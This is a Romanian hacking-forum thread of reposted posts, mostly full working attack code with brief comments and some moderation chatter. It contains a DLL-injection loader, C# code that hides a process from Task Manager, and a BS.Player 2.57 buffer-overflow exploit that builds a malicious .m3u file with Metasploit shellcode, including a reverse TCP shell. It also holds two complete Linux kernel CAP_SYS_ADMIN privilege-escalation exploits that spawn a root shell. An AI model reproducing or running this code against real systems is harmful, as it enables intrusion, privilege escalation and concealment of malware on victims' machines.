Nytro

Dragut, nu stiam asta, Backspace-ul meu iti multumeste

///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2009-10-03] Dll Injection Using SetWindowsHookEx() // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx() // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2011-01-13 | 17:34:45 ///////////////////////////////////////////////////////////////// CODE INFO The SetWindowsHookEx method The SetWindowsHookEx method is a little bit more intrusive than the first, and creates more of a commotion in the injected process, which we normally don\'t want. However, it is a little bit easier to use than the first, and does have it\'s own advantages (like being able to inject into every process on the system in one shot). The SetWindowsHookEx() function is designed to allow you to \"hook\" windows messages for a given thread. This requires that you inject a dll into that process\'s address space, so SetWindowsHookEx() handles all that for us. The dll must have a function for the hook that it created though, otherwise it will crash. SOURCE CODE #define PROC_NAME \"target.exe\" #define DLL_NAME \"injected.dll\" void LoadDll(char *procName, char *dllName); unsigned long GetTargetThreadIdFromProcname(char *procName); int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { LoadDll(PROC_NAME, DLL_NAME); return 0; } void LoadDll(char *procName, char *dllName) { HMODULE hDll; unsigned long cbtProcAddr; hDll = LoadLibrary(dllName); cbtProcAddr = GetProcAddress(hDll, \"CBTProc\"); SetWindowsHookEx(WH_CBT, cbtProcAddr, hDll, GetTargetThreadIdFromProcName(procName)); return TRUE; } unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, \"Error: unable to create toolhelp snapshot\", \"Loader\", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx()

///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2008-07-15] Hide from Taskmanager // r00tsecurity -> Source Code Center :: Hide from Taskmanager // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2011-01-13 | 17:31:42 ///////////////////////////////////////////////////////////////// CODE INFO This code is based off a source in vb6 I saw once. I ported it to C# and it works perfectly (after a few adjustements SOURCE CODE :::=== WINAPI.CS ===::: using System; using System.Collections.Generic; using System.Text; using System.Runtime.InteropServices; namespace WinApi { class User32 { public const Int32 WM_COMMAND = 273; public const Int32 MF_ENABLED = 0; public const Int32 MF_GRAYED = 1; public const Int32 LVM_FIRST = 4096; public const Int32 LVM_DELETEITEM = (LVM_FIRST + 8); public const Int32 LVM_SORTITEMS = (LVM_FIRST + 48); [DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 FindWindow(string lpClassName, string lpWindowName); [DllImport("user32", EntryPoint = "FindWindowExA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 FindWindowEx(Int32 hWnd1, Int32 hWnd2, string lpsz1, string lpsz2); [DllImport("user32", EntryPoint = "EnableWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern bool EnableWindow(Int32 hwnd, Int32 fEnable); [DllImport("user32", EntryPoint = "GetMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenu(Int32 hwnd); [DllImport("user32", EntryPoint = "GetSubMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetSubMenu(Int32 hMenu, Int32 nPos); [DllImport("user32", EntryPoint = "GetMenuState", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenuState(Int32 hMenu, Int32 wID, Int32 wFlags); [DllImport("user32", EntryPoint = "GetMenuItemID", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenuItemID(Int32 hMenu, Int32 nPos); [DllImport("user32", EntryPoint = "EnableMenuItem", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 EnableMenuItem(Int32 hMenu, Int32 wIDEnableItem, Int32 wEnable); /*[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, StringBuilder lParam);*/ [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, String lParam); //Also can add 'ref' or 'out' ahead 'String lParam' // -- Do not use 'out String', use '[Out] StringBuilder' instead and initialize the string builder // with proper length first. Dunno why but that is the only thing that worked for me. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam); [DllImport("user32", EntryPoint = "GetDesktopWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetDesktopWindow(); [DllImport("user32", EntryPoint = "LockWindowUpdate", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 LockWindowUpdate(Int32 hwndLock); } } :::=== FORM1.CS ===::: using WinApi; System.Timers.Timer taskmanTimer = new System.Timers.Timer(700); #region Hide from taskmanager //Begin remove proccess from taskman timer private void removeFromTaskManager() { taskmanTimer.Elapsed += new System.Timers.ElapsedEventHandler(taskmanTimer_Elapsed); taskmanTimer.Enabled = true; } //Timer to remove procces from taskmanager void taskmanTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { Int32 lhWndParent = User32.FindWindow(null, "Windows Task Manager"); /////Define Handles////// Int32 lhWndDialog = 0; Int32 lhWndEndTaskButton = 0; Int32 lhWndEndProcessButton = 0; Int32 lhWndProcessList = 0; Int32 lhWndProcessHeader = 0; Int32 lhWndTaskList = 0; Int32 lhWndTaskHeader = 0; Int32 ProcessItemCount = 0; Int32 ProcessItemIndex = 0; Int32 TaskItemCount = 0; Int32 TaskItemIndex = 0; /////Get Menues///// //Get main menu Int32 hMenu = User32.GetMenu(lhWndParent); //Get View menu Int32 hViewMenu = User32.GetSubMenu(hMenu,2); //Get Update Speed Menu Int32 hUpdateSpeed = User32.GetSubMenu(hViewMenu, 1); //Get Refresh Now Button Int32 hRefreshNow = User32.GetMenuItemID(hViewMenu, 0); //Get High Int32 hHighRate = User32.GetMenuItemID(hUpdateSpeed, 0); //Get Normal Int32 hNormalRate = User32.GetMenuItemID(hUpdateSpeed, 1); //Get Low Int32 hLowRate = User32.GetMenuItemID(hUpdateSpeed, 2); //Get Paused Int32 hPausedRate = User32.GetMenuItemID(hUpdateSpeed, 3); for (int i = 1; i < 7; i++) { lhWndDialog = User32.FindWindowEx(lhWndParent, lhWndDialog, null, null); if(lhWndTaskList == 0) lhWndTaskList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Tasks"); if(lhWndTaskHeader == 0) lhWndTaskHeader = User32.FindWindowEx(lhWndTaskList, 0, "SysHeader32", null); if(lhWndEndTaskButton == 0) lhWndEndTaskButton = User32.FindWindowEx(lhWndDialog, lhWndTaskList, "Button", "&End Task"); if(lhWndProcessList == 0) lhWndProcessList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Processes"); if(lhWndProcessHeader == 0) lhWndProcessHeader = User32.FindWindowEx(lhWndProcessList, 0, "SysHeader32", null); if(lhWndEndProcessButton == 0) lhWndEndProcessButton = User32.FindWindowEx(lhWndDialog, lhWndProcessList, "Button", "&End Process"); } //Pause the update speed User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hPausedRate, IntPtr.Zero); //User32.SendMessage((IntPtr)lhWndParent,(uint)User32.WM_COMMAND,(IntPtr)hPausedRate, /////Disable Menu Items////// User32.EnableMenuItem(hMenu,hRefreshNow,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hLowRate,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hNormalRate,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hHighRate,User32.MF_GRAYED); User32.EnableMenuItem(hHighRate, hPausedRate, User32.MF_GRAYED); User32.EnableWindow(lhWndProcessHeader, 0); User32.EnableWindow(lhWndTaskHeader, 0); Process[] Processes; Int32 z; string item; ListBox list = new ListBox(); list.Sorted = true; Processes = Process.GetProcesses(); foreach (Process p in Processes) { if (p.ProcessName.ToString() == "Idle") list.Items.Add("System Idle Process"); else list.Items.Add(p.ProcessName.ToString()); } ProcessItemCount = Processes.Length; ProcessItemCount--; string HideMe = Process.GetCurrentProcess().ProcessName; for (int x = 0; x != ProcessItemCount; x++) { item = list.Items[x].ToString(); if (item == HideMe) proccessIndex = x; } User32.LockWindowUpdate(lhWndProcessList); //refresh User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hRefreshNow, IntPtr.Zero); //sort items User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_SORTITEMS, IntPtr.Zero,null); //Delete ourselves from the list >=D User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_DELETEITEM, (IntPtr)proccessIndex, IntPtr.Zero); User32.LockWindowUpdate(0); if (lhWndParent == 0) //taskmanager is closed refrsh every 800 miliseconds taskmanTimer.Interval = 800; else //taskmanager is open and paused. we don't have to refresh as fast taskmanTimer.Interval = 2500; } #endregion removeFromTaskManager(); // r00tsecurity -> Source Code Center :: Hide from Taskmanager

Am vazut si eu astea acum cateva zile, dar sunt obisnuit cu astfel de "persoane care se pricep la calculatoare", vedeam mult pe Hellshit. Cel putin, aici, la Offtopic-ul nostru cel de toate zilele nu isi etaleaza nimeni cunostintele incredibile in diverse domenii.

Nu se va inchide. Nu va place sectiunea, nu o vizitati. Apar multe lucruri interesante acolo, desigur, de multe ori nu au legatura cu IT-ul, dar tot sunt interesante. Nu pot fi numai discutii tehnice, si nici nu prea sunt, macar mai discutam cate ceva pe acolo. Nu asa se va scapa de posturile stupide si inutile.

Genul acela de tutoriale sunt pentru "Hacking in viata de zi cu zi" daca putem spune asta, si eu nu vad nimic rau in ele. Stai linistit, sunt destule tutoriale pe care le poti citi.

Bafta tuturor celor care incep sesiunea. E cineva la Informatica la Universitatea - Bucuresti? De maine ma apuc de invatat. Deci cred ca o sa dau mai rar pe aici, sa fiti cuminti.

Da, cred ca e necesara. Eu m-am trezit dimineata, am vazut-o facuta si m-am culcat la loc. Cand m-am trezit aveam impresia ca am visat RST, ca erau categorii noi...

Daca nu e putina disciplina nu se ajunge nicaieri. Problema e ca nimeni nu citeste regulile si in general nu sunt citite topicurile de la "Anunturi" unde se fac diverse precizari. Nu sterg topicuri, decat foarte rar, dar le mut, de cele mai multe ori la Ajutor sau la Cereri, unde le este locul. De ce cacat postati aici orice, cand acel orice are o categorie speciala destinata lui? Ex. http://rstcenter.com/forum/30130-help-download-podcast.rst Fusese postat la Offtopic, cand trebuia postat la Ajutor. Daca ar posta toti tot ce le trece prin cap aici ce ar iesi? Dar nu, trebuie sa dau eu warn-uri si sa stau sa mut topicuri pentru voi...

State of the Art Post Exploitation in Hardened PHP Environments Author: Stefan Esser Abstract In this paper we discuss the different protections an attacker faces in hardened PHP environments, after he succeeded in executing arbitrary PHP code. We introduce new techniques to overcome most of them by the use of local PHP exploits. We demonstrate how info leak and memory corruption vulnerabilities can be combined to enable PHP applications to read and write arbitrary memory. We will show step by step how important memory structures can be leaked and manipulated in order to deactivate or overcome protections. Download: http://www.exploit-db.com/download_pdf/15955 Mai tehnic decat articolele "clasice".

Advanced MySQL Exploitation Author: Muhaimin Dzulfakar Contents 1 Abstract...........................................................................................................................................3 2 Introduction ...................................................................................................................................3 3 Stacked Query................................................................................................................................3 4 Attacking MySQL on applications that do support stacked queries...............................................4 5 Attacking MySQL on applications that do not support stacked queries........................................5 6 Fingerprinting the web server directory.........................................................................................7 6.1 Fingerprint through error message method................................................................................7 6.2 Fingerprint through LOAD_FILE method......................................................................................7 7 Maximum size of arbitrary code allowed........................................................................................7 8 Arbitrary file compression/decompression ....................................................................................8 9 Dealing with columns......................................................................................................................8 10 Remote code execution on LAMP.................................................................................................9 11 Remote code execution on WAMP.............................................................................................10 References .......................................................................................................................................11 Download: http://www.exploit-db.com/download_pdf/15956 Vedeti referintele.

Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) Nu stiu daca merge, dar daca merge se pot face lucruri dragute cu el. # # #[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) #[+]Date: 01\07\2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 #[+]Version: 2.57 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # # ######### ## ######### ######### ## ############### # ######### #### ######### ######### ## ## ## # ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ## ## # ## ########## ######## ######## ## ## ## # ## ## ## ## ## ## ## # ## ## ## ## ## ## ## # ######## ## ######## ######### ## ## ## # ######## ## ######## ######### \/ ############### # #Created By C4SS!0 G0M3S #Louredo_@hotmail.com #www.invasao.com.br # # import os import sys import time import string os.system("cls") os.system("color 4f") def usage(): print "\n" print "[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)" print "[+]Date: 01\\07\\2010" print "[+]Author: C4SS!0 G0M3S" print "[+]Home: www.invasao.com.br" print "[+]E-mail: Louredo_@hotmail.com" print "[+]Version: 2.57" print "[+]Software: Bsplayer 2.57\n" print "[-]Note:" print "TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n" if((len(sys.argv)!=3) or (int(sys.argv[1])<1) or (int(sys.argv[1])>2)): usage() print "Payloads:\n1 - WinExec(\"Calc.exe\",0)\n2 - Reverse_Tcp_Shell\n" print "[-]Usage: "+sys.argv[0]+" <Playload Number> <File Name>" print "[-]Exemple: "+sys.argv[0]+" 1 Exploit.m3u" sys.exit(0) usage() buffer = "\x42" * 4102 nseh = "\x61\x6d" seh = "\xde\x4e" #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe] egg_hunter = "\x45\x61\x45\x61\x45\x50\x45\xc3" junk = "\x45" * 1094 print "[*]Identifying the length Shellcode" time.sleep(1) if int(sys.argv[1]) == 2: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR" # "83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6" # "KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL" #FROM METASPLOIT FRAMEWORK "OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD" # "QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ" #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444 "28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW" # "Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB" #PROMPT: "QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK" # "QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD" #C:\>Telnet 127.0.0.1 4444 "BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA") # # if int(sys.argv[1]) == 1: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR" "8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4" "V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT" "CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP" "YTP3KXWLE3O9XCKXJA") print "[*]The Length Shellcode:"+str(len(shellcode)) time.sleep(1) shellcode += "\x41" * 5000 file = str(sys.argv[2]) payload = buffer+nseh+seh+egg_hunter+junk+shellcode op = "w" print "[*]Creating Your File "+file time.sleep(1) try: f = open(file,op) f.write("http://"+payload) f.close() print "[*]The File "+file+" was Successfully Created" except: print "[*]Error Creating File "+file Sursa: BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)

Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Nu m-am uitat peste el, o sa vad care e treaba cand am putin timp liber. /* * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) * by Joe Sylve * @jtsylve on twitter * * Released: Jan 7, 2011 * * Based on the bug found by Dan Rosenberg (@djrbliss) * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ * * Usage: * gcc -w caps-to-root2.c -o caps-to-root2 * sudo setcap cap_sys_admin+ep caps-to-root2 * ./caps-to-root2 * * Kernel Version >= 2.6.34 (untested on earlier versions) * * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit * * This exploit takes advantage of the same underflow as the original, * but takes a different approach. Instead of underflowing into userspace * (which doesn't work on 64-bit systems and is a lot of work), I underflow * to some static values inside of the kernel which are referenced as pointers * to userspace. This method is pretty simple and seems to be reliable. */ #include <stdio.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> // Skeleton Structures of the Kernel Structures we're going to spoof struct proto_ops_skel { int family; void *buffer1[8]; int (*ioctl)(void *, int, long); void *buffer2[12]; }; struct phonet_protocol_skel { void *ops; void *prot; int sock_type; }; #ifdef __x86_64__ #define SYM_NAME "local_port_range" #define SYM_ADDRESS 0x0000007f00000040 #define SYM_OFFSET 0x0 typedef int (* _commit_creds)(unsigned long cred); typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); #else //32-bit #define SYM_NAME "pn_proto" #define SYM_ADDRESS 0x4e4f4850 #define SYM_OFFSET 0x90 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); #endif _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void * v, int i, long l) { commit_creds(prepare_kernel_cred(0)); return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret; char command[512]; sprintf(command, "grep \"%s\" /proc/kallsyms", name); f = popen(command, "r"); while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); pclose(f); return addr; } } pclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto; unsigned long proto_tab, low_kern_sym, pn_proto; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } close(sock); /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET; pn_proto = get_kernel_sym("pn_proto"); commit_creds = (void *) get_kernel_sym("commit_creds"); prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } if (low_kern_sym >= proto_tab) { printf("[*] %s is mapped higher than prototab. Can not underflow .\n", SYM_NAME); return -1; } /* Map it */ printf("[*] Preparing fake structures...\n"); const struct proto_ops_skel fake_proto_ops2 = { .family = AF_PHONET, .ioctl = &getroot, }; struct phonet_protocol_skel pps = { .ops = (void *) &fake_proto_ops2, .prot = (void *) pn_proto, .sock_type = SOCK_DGRAM, }; printf("[*] Copying Structures.\n"); map = mmap((void *) SYM_ADDRESS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); perror("mmap"); return -1; } memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps)); // Calculate Underflow proto = -((proto_tab - low_kern_sym) / sizeof(void *)); printf("[*] Underflowing with offset %d\n", proto); sock = socket(PF_PHONET, SOCK_DGRAM, proto); if(sock < 0) { printf("[*] Underflow failed .\n"); return -1; } printf("[*] Elevating privlidges...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] This was a triumph... I'm making a note here, huge success.\n"); execl("/bin/sh", "/bin/sh", NULL); close(sock); munmap(map, 0x1000); return 0; } Sursa: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)

Linux Kernel CAP_SYS_ADMIN to root Exploit Nu m-am uitat inca peste el, cand am timp vad care e treaba. /* * Linux Kernel CAP_SYS_ADMIN to root exploit * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc -w caps-to-root.c -o caps-to-root * sudo setcap cap_sys_admin+ep caps-to-root * ./caps-to-root * * This exploit is NOT stable: * * * It only works on 32-bit x86 machines * * * It only works on >= 2.6.34 kernels (it could probably be ported back, but * it involves winning a race condition) * * * It requires symbol support for symbols that aren't included by default in * several distributions * * * It requires the Phonet protocol, which may not be compiled on some * distributions * * * You may experience problems on multi-CPU systems * * It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be * surprised if it doesn't work on other distributions. * * ---- * * Lately there's been a lot of talk about how a large subset of Linux * capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all * capability that, among other things, allows mounting filesystems and * injecting commands into an administrator's shell - in other words, it * trivially allows you to get root. However, I found another way to get root * from CAP_SYS_ADMIN...the hard way. * * This exploit leverages a signedness error in the Phonet protocol. By * specifying a negative protocol index, I can craft a series of fake * structures in userspace and cause the incrementing of an arbitrary kernel * address, which I then leverage to execute arbitrary kernel code. * * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth, * and bla. * */ #include <stdio.h> #include <fcntl.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <linux/capability.h> #include <sys/utsname.h> #include <sys/mman.h> #include <unistd.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void) { commit_creds(prepare_kernel_cred(0)); return 0; } int konami(void) { /* Konami code! */ asm("inc %edx;" /* UP */ "inc %edx;" /* UP */ "dec %edx;" /* DOWN */ "dec %edx;" /* DOWN */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "push %ebx;" /* B */ "pop %ebx;" "push %eax;" /* A */ "pop %eax;" "mov $getroot, %ebx;" "call *%ebx;"); /* START */ return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto, i, offset = -1; unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); pn_ops = get_kernel_sym("phonet_dgram_ops"); pn_ioctl = get_kernel_sym("pn_socket_ioctl"); commit_creds = get_kernel_sym("commit_creds"); prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred || !pn_ops || !pn_ioctl) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } /* Thanks bla, for reminding me how to do basic math */ landing = 0x20000000; proto = 1 << 31 | (landing - proto_tab) >> 2; /* Map it */ printf("[*] Preparing fake structures...\n"); map = mmap((void *)landing, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } /* Pointer to phonet_protocol struct */ ptr = (unsigned long *)landing; ptr[0] = &ptr[1]; /* phonet_protocol struct */ for(i = 1; i < 4; i++) ptr[i] = &ptr[4]; /* proto struct */ for(i = 4; i < 204; i++) ptr[i] = &ptr[204]; /* First, do a test run to calculate any offsets */ target = 0x30000000; /* module struct */ for(i = 204; i < 404; i++) ptr[i] = target; /* Map it */ map = mmap((void *)0x30000000, 0x2000000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } printf("[*] Calculating offsets...\n"); socket(PF_PHONET, SOCK_DGRAM, proto); ptr = 0x30000000; for(i = 0; i < 0x800000; i++) { if(ptr[i] != 0) { offset = i * sizeof(void *); break; } } if(offset == -1) { printf("[*] Test run failed.\n"); return -1; } /* MSB of pn_ioctl */ target = pn_ops + 10 * sizeof(void *) - 1 - offset; /* Re-fill the module struct */ ptr = (unsigned long *)landing; for(i = 204; i < 404; i++) ptr[i] = target; /* Push pn_ioctl fptr into userspace */ printf("[*] Modifying function pointer...\n"); landing = pn_ioctl; while((landing & 0xff000000) != 0x10000000) { socket(PF_PHONET, SOCK_DGRAM, proto); landing += 0x01000000; } /* Map it */ map = mmap((void *)(landing & ~0xfff), 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map payload area.\n"); return -1; } /* Copy payload */ memcpy((void *)landing, &konami, 1024); printf("[*] Executing Konami code at ring0...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] Konami code worked! Have a root shell.\n"); execl("/bin/sh", "/bin/sh", NULL); } Sursa: Linux Kernel CAP_SYS_ADMIN to root Exploit

